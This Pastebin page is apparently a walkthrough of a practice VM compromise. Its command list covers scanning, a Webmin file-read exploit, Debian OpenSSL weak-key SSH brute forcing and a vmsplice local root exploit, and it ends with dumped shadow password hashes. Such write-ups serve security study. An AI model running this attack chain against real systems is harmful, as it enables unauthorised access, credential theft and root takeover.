Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- nmap 192.168.3.1-255
- nmap -sV -sS -O 192.168.3.100
- firefox http://192.168.3.100
- firefox http://192.168.3.100:10000
- firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
- *Webmin <> save. Filename: shadow
- firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
- *Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
- http://milw0rm.com/exploits/5622 (perl)
- http://milw0rm.com/exploits/5720 (python)
- http://milw0rm.com/exploits/5632 (ruby)
- http://www.exploit-db.com/exploits/5622 (perl)
- http://www.exploit-db.com/exploits/5720 (python)
- http://www.exploit-db.com/exploits/5632 (ruby)
- wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
- perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
- perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
- perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
- perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
- tar jxvf debian_ssh_rsa_2048_x86.tar.bz
- cd rsa/2048
- grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
- grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
- *scans for the public key...*
- ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
- exit
- ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
- hostname
- uname -a
- firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
- *Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
- http://milw0rm.com/exploits/5092 (c)
- http://www.exploit-db.com/exploits/5092 (c)
- nano vmsplice.c
- gcc vmsplice.c -o vmsplice
- ./vmsplice
- whoami
- ----------------------------------------------------------------------------------------------------
- Users
- root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
- vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
- obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
- osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
- yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
- ----------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement